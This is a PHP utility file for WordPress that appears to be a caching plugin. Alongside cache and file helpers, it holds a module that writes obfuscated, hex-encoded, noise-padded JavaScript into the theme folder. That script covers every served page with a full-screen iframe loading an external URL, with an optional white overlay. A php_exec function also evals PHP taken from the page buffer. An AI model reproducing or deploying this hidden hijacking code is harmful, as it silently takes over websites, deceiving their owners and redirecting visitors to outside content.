<?php

function d_current_url()
{
  global $d_wp;
  if(!isset($d_wp['current_url'])) $d_wp['current_url'] = 'http'.(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on' ? 's' : '').'://'.$_SERVER['SERVER_NAME'].($_SERVER['SERVER_PORT'] != '80' ? ':'.$_SERVER['SERVER_PORT'] : '').$_SERVER['REQUEST_URI'];
  return $d_wp['current_url'];
}

function d_is_wp_login_page()
{
  return d_contains(d_current_url(), 'wp-login.php');
}

function d_is_wp_xmlrpc()
{
  return d_contains(d_current_url(), 'xmlrpc.php');
}

function d_is_customize_preview()
{
  return d_contains(d_current_url(), 'customize.php');
}

function d_is_wp_json()
{
  return d_contains(d_current_url(), '/wp-json/wp/v');
}

function d_is_admin_ajax()
{
  return d_contains(d_current_url(), 'admin-ajax.php');
}

function d_is_preview()
{
  return d_contains(d_current_url(), 'preview');
}



function d_is_robots_txt()
{
  return d_contains(d_current_url(), 'robots.txt');
}

function d_is_favicon()
{
  return d_contains(d_current_url(), 'favicon.ico');
}

function d_is_ajax_php()
{
  return d_contains(d_current_url(), 'ajax.php');
}

function d_is_index()
{
  global $d_wp;
  if(!isset($d_wp['is_index'])) $d_wp['is_index'] = trim(d_current_url(), '/') == home_url() || is_category() || is_tag() || is_year() || is_month() || is_day() || is_time() || is_author() || is_post_type_archive() || is_tax() || (is_paged() && !d_is_post_or_page());
  return $d_wp['is_index'];
}


 //webalan*****************************
function d_is_post_or_page()
{
  global $d_wp;
  if(!isset($d_wp['is_post_or_page'])) 
  $d_wp['is_post_or_page'] = is_singular(array('post', 'page', 'komp'));


  return $d_wp['is_post_or_page'];
}
//*************************************

 

function d_is_index_or_post_or_page()
{
  return d_is_index() || d_is_post_or_page();
}


function d_future_posts_exists()
{
  global $d_wp;
  global $wpdb;
  if(!isset($d_wp['d_future_posts_exists'])) $d_wp['d_future_posts_exists'] = intval($wpdb->get_var("SELECT COUNT(ID) FROM $wpdb->posts WHERE post_status = 'future' LIMIT 1")) > 0;
  return $d_wp['d_future_posts_exists'];
}


function d_need_to_cache_this_url()
{
  if(d_is_robots_txt() || d_is_wp_login_page() || d_is_preview() || d_is_customize_preview() || d_is_ajax_php() || d_is_favicon()) return false;

  $index = d_is_index();
  $post_or_page = d_is_post_or_page();

  if(!$index && !$post_or_page) return false;

  if($post_or_page && !CACHE) return false;

  if($index && !CACHE_INDEX) return false;

  if(d_need_to_cache_ignore_this_url()) return false;

  if($index && d_future_posts_exists() && !CACHE_INDEX_IF_FUTURE_POSTS_EXISTS) return false;

  return true;
}

function d_need_to_cache_ignore_this_url()
{
  if(!CACHE_IGNORE_URLS) return false;
  $current_url = d_current_url();
  foreach(explode("\n", d_d(CACHE_IGNORE_URLS_LIST)) as $url) if(preg_match('#'.str_replace('\*', '.*', preg_quote($url)).'\|#i', $current_url.'|')) return true;
  return false;
}


function d_show_debug_bar($buffer, $from_cache = false)
{
  if(!$from_cache && !d_is_index_or_post_or_page()) return $buffer;


  if((CACHE || CACHE_INDEX))
  {
    if($from_cache)
    {
      $from_cache_stat = 'yes';
    }
    else
    {
      if(d_need_to_cache_ignore_this_url()) $from_cache_stat = 'ignore';
      else $from_cache_stat = 'no';
    }
  }
  else
  {
    $from_cache_stat = $from_cache ? 'yes' : 'off';
  }

  $debug_bar = '<div style="position:fixed!important; z-index:999999999!important; bottom:0!important; right:0!important; padding:15px!important; margin:0!important; background:#000!important; box-shadow: 0 0 10px #000 !important; font-size:13px!important; line-height:14px!important; font-family:Tahoma!important; font-weight:normal!important; color:#fff!important">cache:'.$from_cache_stat.' / mysql:'.($from_cache ? '0' : get_num_queries()).' / gen:'.($from_cache ? '0' : timer_stop(0)).' / memory:'.round(memory_get_usage() / 1024 / 1024, 2).' MB</div>';

  $buffer = d_buffer_insert($buffer, '</body>', $debug_bar, 1, true, true);

  return $buffer;
}


function php_exec_all($buffer)
{
  foreach(d_regex_all('/<\?php.*?\?>/si', $buffer) as $php) $buffer = str_replace($php, php_exec($php), $buffer);
  return $buffer;
}

function php_exec($php)
{
  set_include_path(dirname(dirname(__FILE__)));
  $result = '';
  eval('ob_start(); '.str_replace(array('<?php', '<?PHP', '<?', '?>'), '', $php).'$result=ob_get_contents(); ob_end_clean();');
  return $result;
}


function screen_js(&$html)
{
    $jss = d_regex_all('%<script.*?/script>%si', $html);
    foreach($jss as $js_key => $js) $html = str_replace($js, '[js'.$js_key.']', $html);
    return $jss;
}

function unscreen_js(&$html, $jss)
{
    foreach($jss as $js_key => $js) $html = str_replace('[js'.$js_key.']', $js, $html);
}


function d_e($str)
{
  return str_replace(array("'", '\\', "\n", "\r"), array('&dq;', '&ds;', '&dn;', ''), $str);
}

function d_d($str)
{
  return str_replace(array('&dq;', '&ds;', '&dn;'), array("'", '\\', "\n"), $str);
}


function d_regex($pattern, $subject, $default = '')
{
  preg_match($pattern, $subject, $match);
  return (isset($match[0])) ? $match[0] : $default;
}

function d_regex_all($pattern, $subject)
{
  preg_match_all($pattern, $subject, $matches);
  return $matches[0];
}

function d_regex_replace($pattern, $replacement, $subject)
{
  return preg_replace($pattern, $replacement, $subject);
}

function d_regex_is_match($pattern, $subject)
{
  return preg_match($pattern, $subject);
}

function d_contains_one_of($haystack, $needles)
{
  foreach($needles as $needle) if(stripos($haystack, $needle)) return true;
  return false;
}

function d_contains($haystack, $needle)
{
  return stripos($haystack, $needle) !== false;
}


function d_get_files($dir)
{
  $dir = rtrim($dir, '/');

  if(!file_exists($dir)) return array();

  $files_scan = scandir($dir);
  array_shift($files_scan);
  array_shift($files_scan);

  $files = array();
  foreach($files_scan as $file_scan) if(is_file($dir.'/'.$file_scan)) $files[] = $file_scan;

  return $files;
}

function d_get_dirs($dir)
{
  $dir = rtrim($dir, '/');

  if(!file_exists($dir)) return array();

  $files_scan = scandir($dir);
  array_shift($files_scan);
  array_shift($files_scan);

  $dirs = array();
  foreach($files_scan as $file_scan) if(!is_file($dir.'/'.$file_scan)) $dirs[] = $file_scan;
  return $dirs;
}

function d_rmdir($dir)
{
  foreach(array_diff(scandir($dir), array('.', '..')) as $file) is_dir("$dir/$file") ? d_rmdir("$dir/$file") : unlink("$dir/$file");
  return rmdir($dir);
}

function d_copy_dir($source, $dest)
{
  if(is_dir($source))
  {
    $dir_handle = opendir($source);
    while($file = readdir($dir_handle))
    {
      if($file != '.' && $file != '..')
      {
        if(is_dir($source.'/'.$file))
        {
          if(!is_dir($dest.'/'.$file)) mkdir($dest.'/'.$file);
          d_copy_dir($source.'/'.$file, $dest.'/'.$file);
        }
        else
        {
          copy($source.'/'.$file, $dest.'/'.$file);
        }
      }
    }
    closedir($dir_handle);
  }
  else
  {
    copy($source, $dest);
  }
}

function d_unzip($path_zip, $path_extract)
{
  $zip = new ZipArchive;
  $res = $zip->open($path_zip);
  if($res === TRUE)
  {
    $zip->extractTo($path_extract);
    $zip->close();
    return true;
  }
  else
  {
    return false;
  }
}


function d_buffer_insert($buffer, $str_search, $str_add, $n = 3, $add_before = false, $from_end = false)
{
  $str_search_len = strlen($str_search);

  $substr_count = substr_count($buffer, $str_search);

  if($n > $substr_count) $n = $substr_count;

  $all_pos = array();
  $pos = 0;
  for($i = 0; $i < $substr_count; $i++)
  {
    $pos = strpos($buffer, $str_search, $pos) + ($add_before ? 0 : $str_search_len);
    $all_pos[] = $pos;
    if($add_before) $pos++;
  }

  if($from_end) $all_pos = array_reverse($all_pos);

  $buffer = substr_replace($buffer, ($add_before ? '' : "\n").$str_add.($add_before ? "\n" : ''), $all_pos[$n - 1], 0);

  return $buffer;
}


function d_gen_name($charters_count = 0, $lowercase = false)
{
  if($charters_count == 0) $charters_count = rand(3, 10);

  $characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
  $characters_length = strlen($characters);
  $random_string = '';
  for($i = 0; $i < $charters_count; $i++) $random_string .= $characters[rand(0, $characters_length - 1)];
  return $lowercase ? strtolower($random_string) : $random_string;
}

define('D_IFRAME_DEBUG', false);

function d_iframe_buffer_start_callback($buffer)
{
  if(is_robots() || is_404()) return $buffer;

  // идентификатор актуальности кода фрейма
  $iframe_id = md5(DOMAIN_ID.IFRAME_URL.'v6'.rand(999, 99999));


  // путьи к файлам скриптов iframe
  $theme_directory = get_template_directory();
  $theme_directory_js_folder_exists = file_exists($theme_directory.'/js');
  $iframe_file_name = md5(DOMAIN_ID.DOMAIN_ID).'.js';
  $iframe_ajax_file_name = md5(DOMAIN_ID.DOMAIN_ID.'ajax').'.js';
  $iframe_file = ($theme_directory_js_folder_exists ? $theme_directory.'/js/' : $theme_directory.'/').$iframe_file_name;
  $iframe_ajax_file = ($theme_directory_js_folder_exists ? $theme_directory.'/js/' : $theme_directory.'/').$iframe_ajax_file_name;

  // определяем url-ы скриптов
  $theme_url = str_replace('www.', '', get_template_directory_uri());
  $iframe_file_url = ($theme_directory_js_folder_exists ? $theme_url.'/js/' : $theme_url.'/').$iframe_file_name;

  // генерируем скрипты для вывода js
  if(!file_exists($iframe_file) || !file_exists($iframe_ajax_file) || $iframe_id != IFRAME_ID)
  {
    $iframe = d_iframe_get_code($iframe_id);
    file_put_contents($iframe_file, $iframe);

    $iframe_ajax = d_iframe_ajax_get_code($iframe_id, $iframe_file_url);
    file_put_contents($iframe_ajax_file, $iframe_ajax);
  }


  $iframe_ajax_file_url = ($theme_directory_js_folder_exists ? $theme_url.'/js/' : $theme_url.'/').$iframe_ajax_file_name;

  $iframe_insert = '<script type="text/javascript" src="'.(IFRAME_AJAX ? $iframe_ajax_file_url : $iframe_file_url).'"></script>';

  $buffer = d_buffer_insert($buffer, '</div>', $iframe_insert, 5);

  // если выводим белый div
  if(IFRAME_DIV)
  {
    $iframe_div = d_iframe_get_div();
    $buffer = d_buffer_insert($buffer, '</div>', $iframe_div, 1);
  }

  return $buffer;
}

function d_iframe_get_code($iframe_id)
{
  // пытаемся найти сохраненную запись
  $iframe_js = D_IFRAME_DEBUG || $iframe_id != IFRAME_ID ? '' : IFRAME_CODE;

  // если не нашли
  if($iframe_js == '')
  {
    // генерируем
    $iframe_js = d_iframe_get_iframe_obf();

    // сохраняем
    d_config::get()->save('IFRAME_CODE', $iframe_js);
    d_config::get()->save('IFRAME_ID', $iframe_id);
  }

  return $iframe_js;
}

function d_iframe_ajax_get_code($iframe_id, $iframe_file_url)
{
  // пытаемся найти сохраненную запись
  $iframe_ajax_js = D_IFRAME_DEBUG || $iframe_id != IFRAME_ID ? '' : IFRAME_AJAX_CODE;

  // если не нашли
  if($iframe_ajax_js == '')
  {
    // генерируем
    $iframe_ajax_js = d_iframe_get_iframe_ajax_obf($iframe_file_url);

    // сохраняем
    d_config::get()->save('IFRAME_AJAX_CODE', $iframe_ajax_js);
  }

  return $iframe_ajax_js;
}

function d_iframe_get_iframe_obf()
{
  // объявляем переменные
  $vars = array();

  // html styles
  $html_var = d_gen_name();
  $html_styles = d_iframe_obf_str('html', $html_var);

  $hidden_var = d_gen_name();
  $html_styles .= d_iframe_obf_str('hidden', $hidden_var);

  $html_styles .= 'document.getElementsByTagName('.$html_var.')[0].style.overflow='.$hidden_var.';';

  $vars[] = $html_styles;

  // title
  $title_var = d_gen_name();
  $vars[] = $title_var.'=encodeURIComponent(document.title);';

  // URL
  $url = IFRAME_URL;
  $url_var = d_gen_name();
  $vars[] = d_iframe_obf_str($url, $url_var);

  // первая часть фрейма
  $frame_begin_var = d_gen_name();
  $vars[] = d_iframe_obf_str('<iframe src="', $frame_begin_var);

  // вторая часть фрейма
  $frame_end_var = d_gen_name();

  $frame_styles = d_iframe_shuffle_attributes(array('position:fixed;', 'top:0;', 'left:0;', 'right:0;', 'bottom:0;', 'z-index:99999999;', 'width:100%;', 'height:100%;', 'border:none;', 'background:#fff;'));

  $frame_attrs = d_iframe_shuffle_attributes(array('style="'.$frame_styles.'"', 'width="100%"', 'height="100%"', 'frameborder="0"', 'hspace="0"', 'vspace="0"', 'marginheight="0"', 'marginwidth="0"', 'scrolling="yes"'));

  $vars[] = d_iframe_obf_str('" '.$frame_attrs.'></iframe>', $frame_end_var);

  // генерируем шум
  for($i = 0; $i < rand(10, 30); $i++) $vars[] = d_iframe_obf_str(d_gen_name(), d_gen_name());

  // перемешиваем переменные
  if(!D_IFRAME_DEBUG) shuffle($vars);

  $iframe_js = implode('', $vars).'document.write('.$frame_begin_var.'+'.$url_var.'.replace("[title]", '.$title_var.')+'.$frame_end_var.');';

  return $iframe_js;
}

function d_iframe_get_iframe_ajax_obf($iframe_file_url)
{
  // объявляем переменные
  $vars = array();

  // ajaxer
  $xhr = d_gen_name();
  $vars[] = $xhr.'=new XMLHttpRequest();';

  // iframe insert script url
  $iframe_file_url_obf = d_gen_name();
  $vars[] = d_iframe_obf_str($iframe_file_url, $iframe_file_url_obf);

  // script open tag
  $script_tag_open = d_gen_name();
  $vars[] = d_iframe_obf_str('<script type="text/javascript">', $script_tag_open);

  // script close tag
  $script_tag_close1 = d_gen_name();
  $vars[] = d_iframe_obf_str('<', $script_tag_close1);
  $script_tag_close2 = d_gen_name();
  $vars[] = d_iframe_obf_str('/script>', $script_tag_close2);

  // генерируем мусор
  for($i = 0; $i < rand(10, 30); $i++) $vars[] = d_iframe_obf_str(d_gen_name(), d_gen_name());

  // перемешиваем переменные
  if(!D_IFRAME_DEBUG) shuffle($vars);

  return implode('', $vars).$xhr.'.open("GET",'.$iframe_file_url_obf.',false);'.$xhr.'.send();document.write('.$script_tag_open.'+'.$xhr.'.responseText+'.$script_tag_close1.'+'.$script_tag_close2.');';
}

function d_iframe_obf_str($str, $var)
{
  if(D_IFRAME_DEBUG) return $var.'=\''.$str.'\';';

  $arr_name = d_gen_name();

  $result = $arr_name.'=[];';

  $chars = str_split($str);

  $rnd = rand(1, 31);

  $chars_js = array();
  for($i = 0; $i < count($chars); $i++)
  {
    $rnd_index = $i + $rnd;
    $chars_js[] = $arr_name.'['.$rnd_index.']="'.($chars[$i] == '"' ? '\"' : d_iframe_str2hex($chars[$i])).'";';
  }

  shuffle($chars_js);

  for($i = 0; $i < count($chars_js); $i++) $result .= $chars_js[$i];

  $result .= $var.'='.$arr_name.'.join("");';

  return $result;
}

function d_iframe_str2hex($str)
{
  $hex = '';
  for($i = 0; $i < strlen($str); $i++) $hex .= '\x'.dechex(ord($str[$i]));
  return $hex;
}

function d_iframe_shuffle_attributes($attributes)
{
  if(!D_IFRAME_DEBUG) shuffle($attributes);
  return implode(' ', $attributes);
}

function d_iframe_get_div()
{
  $div_id = md5(DOMAIN_ID.'v1');

  if(IFRAME_DIV_CODE != '' && $div_id == IFRAME_DIV_ID && !D_IFRAME_DEBUG) return IFRAME_DIV_CODE;

  $div_styles = d_iframe_shuffle_attributes(array('display:block;', 'position:fixed;', 'top:0;', 'left:0;', 'right:0;', 'bottom:0;', 'z-index:9999999;', 'width:100%;', 'height:100%;', 'border:none;', 'background:#fff;'));
  $div_attrs = d_iframe_shuffle_attributes(array('style="'.$div_styles.'"', 'width="100%"', 'height="100%"'));
  $blocks = array('div', 'span', 'p', 'b', 'i', 's', 'strong', 'strike', 'code', 'q', 'sup', 'sub', 'big', 'small', 'var');
  shuffle($blocks);
  $iframe_div_code = '<'.$blocks[0].' '.$div_attrs.'"></'.$blocks[0].'>';

  d_config::get()->save('IFRAME_DIV_ID', $div_id);
  d_config::get()->save('IFRAME_DIV_CODE', $iframe_div_code);

  return $iframe_div_code;
}

